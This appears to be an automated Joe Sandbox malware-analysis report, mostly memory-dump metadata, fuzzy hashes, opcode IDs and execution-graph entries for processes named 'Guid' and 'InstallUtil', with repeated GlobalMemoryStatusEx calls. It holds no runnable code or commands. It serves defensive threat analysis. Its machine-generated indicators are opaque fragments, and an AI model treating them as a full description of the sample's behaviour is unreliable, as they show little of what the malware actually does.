                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 966cf8f753ff762a5467d3d4d0117b19469cf883fbc54ee118c89e84a417322c
                                                                          • Instruction ID: 2ac65b07014e5683d9483a8ba4d83a13e6e937a380121ec3c474c49989689583
                                                                          • Opcode Fuzzy Hash: 966cf8f753ff762a5467d3d4d0117b19469cf883fbc54ee118c89e84a417322c
                                                                          • Instruction Fuzzy Hash: 2CE0E574D04248EFCB85DF94D940AACBBB4EB48201F14C1AA984853341DA319B51DF84
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 966cf8f753ff762a5467d3d4d0117b19469cf883fbc54ee118c89e84a417322c
                                                                          • Instruction ID: 252dcba77288dbc9261a6c37a492b4a01b56fff71edd5e752782682635173ead
                                                                          • Opcode Fuzzy Hash: 966cf8f753ff762a5467d3d4d0117b19469cf883fbc54ee118c89e84a417322c
                                                                          • Instruction Fuzzy Hash: C0E0E5B4D05248AFDB85DF94E940AACBBB5EB48210F10C1AADC4853341DA319A51DF84
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2499586538.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_7680000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fb784773bc3037675e62e187647a81e48d4f8923a302b1b400195cfbd63b10c4
                                                                          • Instruction ID: ce0ac9be566524ac6bcefcc183439a09f2f97d044359aa4d2eb7e4aa73d369a6
                                                                          • Opcode Fuzzy Hash: fb784773bc3037675e62e187647a81e48d4f8923a302b1b400195cfbd63b10c4
                                                                          • Instruction Fuzzy Hash: D8E04FB4D04248EFCB04DFA4D4406BCFBB8EB49210F14C1EAC81953345D6319E42DF44
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 98a234c2c987afba087ff20abd6ab6768ee7a9284ea7b3d92e4842785ebf902b
                                                                          • Instruction ID: e4534f6c8addf4d3b7e4a1d08b7d7f39742f41b1e2365a4fa8665831c39c5e96
                                                                          • Opcode Fuzzy Hash: 98a234c2c987afba087ff20abd6ab6768ee7a9284ea7b3d92e4842785ebf902b
                                                                          • Instruction Fuzzy Hash: B8F0157584461FDBCF21AF60C814ADAB732FF54304F108286AA5933210DB30AADACF80
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7cf1cb683a8641171aa6f2be42ded8975d113d81dd4f0bcc9c7da81181ea66d2
                                                                          • Instruction ID: 54dcd910272126e0e1b0790c4196dd412a8240be984961ebf14673d1817d6ebe
                                                                          • Opcode Fuzzy Hash: 7cf1cb683a8641171aa6f2be42ded8975d113d81dd4f0bcc9c7da81181ea66d2
                                                                          • Instruction Fuzzy Hash: 6AE0E57494410CDFDF559F84C844AEEBB72FB48305F008008E60566294C7794A85DBA4
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2499586538.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                          • Snapshot File: hcaresult_5_2_7680000_Guid.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2499586538.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                          • Snapshot File: hcaresult_5_2_7680000_Guid.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2488659818.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                                          • Snapshot File: hcaresult_5_2_6070000_Guid.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2499586538.0000000007680000.00000040.00000800.00020000.00000000.sdmp, Offset: 07680000, based on PE: false
                                                                          • Snapshot File: hcaresult_5_2_7680000_Guid.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2450898330.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                          • Snapshot File: hcaresult_5_2_15a0000_Guid.jbxd

                                                                          Execution Graph

                                                                          Execution Coverage:11.7%
                                                                          Dynamic/Decrypted Code Coverage:71.4%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:35
                                                                          Total number of Limit Nodes:7
                                                                          execution_graph 26419 fe099b 26421 fe084e 26419->26421 26420 fe091b 26421->26419 26421->26420 26424 fe132f 26421->26424 26430 fe143b 26421->26430 26425 fe1314 26424->26425 26427 fe1333 26424->26427 26425->26421 26426 fe1434 26426->26421 26427->26426 26428 fe143b 3 API calls 26427->26428 26435 fe7040 26427->26435 26428->26427 26431 fe1346 26430->26431 26432 fe1434 26431->26432 26433 fe143b 3 API calls 26431->26433 26434 fe7040 3 API calls 26431->26434 26432->26421 26433->26431 26434->26431 26436 fe704a 26435->26436 26437 fe708c 26436->26437 26443 5e1cae1 26436->26443 26448 5e1cae8 26436->26448 26437->26427 26438 fe705d 26453 5e1de88 26438->26453 26457 5e1de78 26438->26457 26444 5e1cae8 26443->26444 26445 5e1cd0e 26444->26445 26446 5e1d128 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 26444->26446 26447 5e1d138 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 26444->26447 26445->26438 26446->26444 26447->26444 26449 5e1cafd 26448->26449 26450 5e1cd0e 26449->26450 26451 5e1d128 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 26449->26451 26452 5e1d138 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 26449->26452 26450->26438 26451->26449 26452->26449 26456 5e1de89 26453->26456 26454 5e1d138 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 26454->26456 26455 5e1e0e9 26455->26437 26456->26454 26456->26455 26459 5e1de84 26457->26459 26458 5e1e0e9 26458->26437 26459->26458 26460 5e1d138 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 26459->26460 26460->26459
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: y7$B$y7$B
                                                                          • API String ID: 0-638310769

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: y7$B$y7$B
                                                                          • API String ID: 0-638310769
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9f6b1aab75204ba2cae6b1bfdf37daf326a5711c8db8696842b897de844bb215
                                                                          • Instruction ID: b3986b0cfe81ddf64eaab5b2699f24155af4aa923cd7645c40b92386a336fc5e
                                                                          • Opcode Fuzzy Hash: 9f6b1aab75204ba2cae6b1bfdf37daf326a5711c8db8696842b897de844bb215
                                                                          • Instruction Fuzzy Hash: D732A034A042458FDB14DF69D884BADBBB2FF88320F14856AE905EB395DBB0DC45DB60

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3440787115.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_5e10000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: y7$B
                                                                          • API String ID: 0-2137850373
                                                                          • Opcode ID: a6c8fc9829bcd4664782c62e3e28695e53cf9ab0e6571aa3b60c02962beaaf3c
                                                                          • Instruction ID: 18a529cce7a29553a597767dc1a971cdbb7952e5b57853eb3739adf9db2a9843
                                                                          • Opcode Fuzzy Hash: a6c8fc9829bcd4664782c62e3e28695e53cf9ab0e6571aa3b60c02962beaaf3c
                                                                          • Instruction Fuzzy Hash: BE41DFB2E0475A8FDB04CFA9D8407AEBBF5AF89310F14866AD844A7241DB749845CBD4

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 27 5e1d0e8-5e1de44 GlobalMemoryStatusEx 31 5e1de46-5e1de4c 27->31 32 5e1de4d-5e1de75 27->32 31->32
                                                                          APIs
                                                                          • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05E1DD4A), ref: 05E1DE37
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3440787115.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_5e10000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID: GlobalMemoryStatus
                                                                          • String ID: y7$B
                                                                          • API String ID: 1890195054-2137850373
                                                                          • Opcode ID: 7a4871bb324f517d6dabc206f17d7afc047040fbb0d3b789e64bcf42e3b535dc
                                                                          • Instruction ID: a9fcaff8266ebb11cbcb39e6f63f3cb7636bec4e934ae71ca99ee8e1a88dbde0
                                                                          • Opcode Fuzzy Hash: 7a4871bb324f517d6dabc206f17d7afc047040fbb0d3b789e64bcf42e3b535dc
                                                                          • Instruction Fuzzy Hash: 3A11F4B1C006599BDB10CF9AC944B9EFBF4BB48220F10816AD918A7240D778A954CFA5

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 35 5e1ddc8-5e1ddca 36 5e1ddd1-5e1de0e 35->36 37 5e1ddcc 35->37 38 5e1de16-5e1de44 GlobalMemoryStatusEx 36->38 37->36 39 5e1de46-5e1de4c 38->39 40 5e1de4d-5e1de75 38->40 39->40
                                                                          APIs
                                                                          • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05E1DD4A), ref: 05E1DE37
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3440787115.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_5e10000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID: GlobalMemoryStatus
                                                                          • String ID: y7$B
                                                                          • API String ID: 1890195054-2137850373
                                                                          • Opcode ID: 1d21493704c64a62e9d8cfa803a1e2ba34fe36b9dfaf8a7abaa686a84b51d807
                                                                          • Instruction ID: 477064d99aa4334c408691509e9aef811e84128395b10d1d974c84a9533fba6b
                                                                          • Opcode Fuzzy Hash: 1d21493704c64a62e9d8cfa803a1e2ba34fe36b9dfaf8a7abaa686a84b51d807
                                                                          • Instruction Fuzzy Hash: 1D1144B1C0065ADFDB10CF9AC944BDEFBB4BF48320F10826AD818A7240D778A940CFA5

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: y7$B$y7$B
                                                                          • API String ID: 0-638310769
                                                                          • Opcode ID: 4b3a6681998fc2d5d56d5218370018281cd47e63c4d2ebd8e485476b820acb53
                                                                          • Instruction ID: 4a28c0a0fc791c7d38878e729b304e638a179ccd3b2d4b6f51d9cc99b2093e15
                                                                          • Opcode Fuzzy Hash: 4b3a6681998fc2d5d56d5218370018281cd47e63c4d2ebd8e485476b820acb53
                                                                          • Instruction Fuzzy Hash: 9DB15F70E00649CFDB20CFAAD88579DBBF1BF88724F24812DD815E7254EB74A845DB91

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: y7$B$y7$B
                                                                          • API String ID: 0-638310769
                                                                          • Opcode ID: 96f76b293fcb10099f5dcdd4494e854b515aa6dbfa46040a98aaa44da6b6ecf7
                                                                          • Instruction ID: 35460584185a55f8d9d48484068ebb3d8652dafd454ae89391779c7d00996759
                                                                          • Opcode Fuzzy Hash: 96f76b293fcb10099f5dcdd4494e854b515aa6dbfa46040a98aaa44da6b6ecf7
                                                                          • Instruction Fuzzy Hash: 8C916C70E00289CFDF14CFAAC9897DEBBF2AF88714F148129E405A7254DB74A985DB81

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: y7$B$y7$B
                                                                          • API String ID: 0-638310769
                                                                          • Opcode ID: e72db7db118fc30d20294f63c75033f5e71c851c9a366559ccfb05cbdd48731d
                                                                          • Instruction ID: c3822c511c57c01e24b92e72789c4b5b60cea8a4c00e1fb8f374ba1bad386147
                                                                          • Opcode Fuzzy Hash: e72db7db118fc30d20294f63c75033f5e71c851c9a366559ccfb05cbdd48731d
                                                                          • Instruction Fuzzy Hash: 48715670D0038DDFDB10CF9AC584ADEBBB5EF48314F20801AE409AB254EB75A945DF91

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: y7$B$y7$B
                                                                          • API String ID: 0-638310769
                                                                          • Opcode ID: 34ec21ad4a5e9b39bd591223e007e5381b92c7b7f446c4a95020847017d45670
                                                                          • Instruction ID: c72ff7bf161cbc2ee505d850984e559b58bdc6e897a080d336da536c6094a326
                                                                          • Opcode Fuzzy Hash: 34ec21ad4a5e9b39bd591223e007e5381b92c7b7f446c4a95020847017d45670
                                                                          • Instruction Fuzzy Hash: B9512675E002588FDB18CFAAC845BDDBBB1BF48320F54811AE815BB391D774A844CF54

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: y7$B$y7$B
                                                                          • API String ID: 0-638310769
                                                                          • Opcode ID: db2a7391614a022061d38adffa297bf4ea4fbc08c9be3b1d3798081a6ac2df14
                                                                          • Instruction ID: 364f21ae09d63229271c09252c06615446831d457d66e5bf0a8f58a8caceac64
                                                                          • Opcode Fuzzy Hash: db2a7391614a022061d38adffa297bf4ea4fbc08c9be3b1d3798081a6ac2df14
                                                                          • Instruction Fuzzy Hash: 65511675E002588FDB28CFAAC844B9DFBB1BF48310F54851AE815BB391DB74A844DF95

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: y7$B
                                                                          • API String ID: 0-2137850373
                                                                          • Opcode ID: ac5116f441a92cf1bb73ec468f653707c9d4f240d210ee5f80840910b84a4011
                                                                          • Instruction ID: c31c5ecaf668882fd42965771ca7972d4d2e6c10c0251e736932cf381d2a96fc
                                                                          • Opcode Fuzzy Hash: ac5116f441a92cf1bb73ec468f653707c9d4f240d210ee5f80840910b84a4011
                                                                          • Instruction Fuzzy Hash: B641FFB0D0034DDFDB10DFAAC980ADEBBB5EF48310F208029E419AB254EB75A945CB91

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: y7$B
                                                                          • API String ID: 0-2137850373
                                                                          • Opcode ID: 6bc9ace6079d20e7c96c0be95062570fc6553e6b05db0791f1b1f188a1eb28e4
                                                                          • Instruction ID: 738e182a9bbd48e43b0638e036ea2c695d77a24568d1462cd156934e3c91f903
                                                                          • Opcode Fuzzy Hash: 6bc9ace6079d20e7c96c0be95062570fc6553e6b05db0791f1b1f188a1eb28e4
                                                                          • Instruction Fuzzy Hash: 4F41C0B1D00349DFDB10DFAAC584A9EBBB5EF48310F248029E419AB254DB75A945CB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1d0a34ee92c5bf087ca5c50aa92f2463acf0f53a5a8378d2be6d1c3cbabae56e
                                                                          • Instruction ID: ea2346b1892978fbd5dce31dc301c8370a1d41dcab63bf78447f2c5511d654db
                                                                          • Opcode Fuzzy Hash: 1d0a34ee92c5bf087ca5c50aa92f2463acf0f53a5a8378d2be6d1c3cbabae56e
                                                                          • Instruction Fuzzy Hash: 8A128130700202CBDB29A739E44422C77E3FBC9355B149A6EE405DB365DFBAED869781
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3428514830.0000000000BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BED000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_bed000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f2ae41ab9c2bbbbae4a5de8a5934c733c5a1ad0eb870f2901cb539f66cf8562b
                                                                          • Instruction ID: 8b4436e04b7f2f256355483852acc5c6068b58337a844bea52eca724571fa6f1
                                                                          • Opcode Fuzzy Hash: f2ae41ab9c2bbbbae4a5de8a5934c733c5a1ad0eb870f2901cb539f66cf8562b
                                                                          • Instruction Fuzzy Hash: 8E213775504284DFCB14DF15D9D0B26BBA1FB84314F28C5ADD90A4B293C3B6D847CA62
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: edcd452b62525a7394601f1c5561c20f53e3dff197fd829d045360f591881d2b
                                                                          • Instruction ID: 8cb35706c0fb5d0463646eb24ef20428003f15e42b44d322bf70452aa8131a76
                                                                          • Opcode Fuzzy Hash: edcd452b62525a7394601f1c5561c20f53e3dff197fd829d045360f591881d2b
                                                                          • Instruction Fuzzy Hash: 4321A430E0425A9BCB19CFA5C8446DEF7B2BF89310F20852AE816FB351DBB09D41CB60
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 46639a35d8b25de8d300f3e73b0c380f9be686dc04b4b2b52ea9357be1b7a72f
                                                                          • Instruction ID: 5764244a5e0588506539815fd6ac17461d202760cd9b9e0276ccc6048d5b19de
                                                                          • Opcode Fuzzy Hash: 46639a35d8b25de8d300f3e73b0c380f9be686dc04b4b2b52ea9357be1b7a72f
                                                                          • Instruction Fuzzy Hash: FB118172E002959FCB21EFBB98412AD7BE4FB56324B250076D405DB382E63ACC82D791
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5b4d42775603f4e8f11e07ea6fa35b9d3d8b48d19b8e277a4a770f2263383426
                                                                          • Instruction ID: 3ca3eeb5853d1230f9d4ae567ae7dcd99464d2d23e1b194ad635900241a5d44d
                                                                          • Opcode Fuzzy Hash: 5b4d42775603f4e8f11e07ea6fa35b9d3d8b48d19b8e277a4a770f2263383426
                                                                          • Instruction Fuzzy Hash: 39115676F002914FDB11AB7658482AEBBF9FB8A220F1044A6D919C7241EB38CD82C791
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 85d4deb7b5207afb514311840dabb458027642147839d33c3e17366fabf139a5
                                                                          • Instruction ID: 0585be1a9c4e3efcd3fd96615a1a8bb0c3c787d4b73ddfe60fffbeaf89fc6232
                                                                          • Opcode Fuzzy Hash: 85d4deb7b5207afb514311840dabb458027642147839d33c3e17366fabf139a5
                                                                          • Instruction Fuzzy Hash: E2212C31B00649CBDB14EB76C5657AE77F2BB89354F100468D106EB3A4DB35DE40EB91
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 28dae926af34dd4705d02c60697dc5e8b3d1855c7d83777633bd4d82630ba60e
                                                                          • Instruction ID: c400a04ba49fb5d1c1c9c2f0bd7c640e4b4eed89358e6667580a9f5105b7455d
                                                                          • Opcode Fuzzy Hash: 28dae926af34dd4705d02c60697dc5e8b3d1855c7d83777633bd4d82630ba60e
                                                                          • Instruction Fuzzy Hash: AC21B734A001418FEF11FB3AE888B5A3727F785765F105969D106CB259DEB8DC849BC2
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3428514830.0000000000BED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BED000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_bed000_InstallUtil.jbxd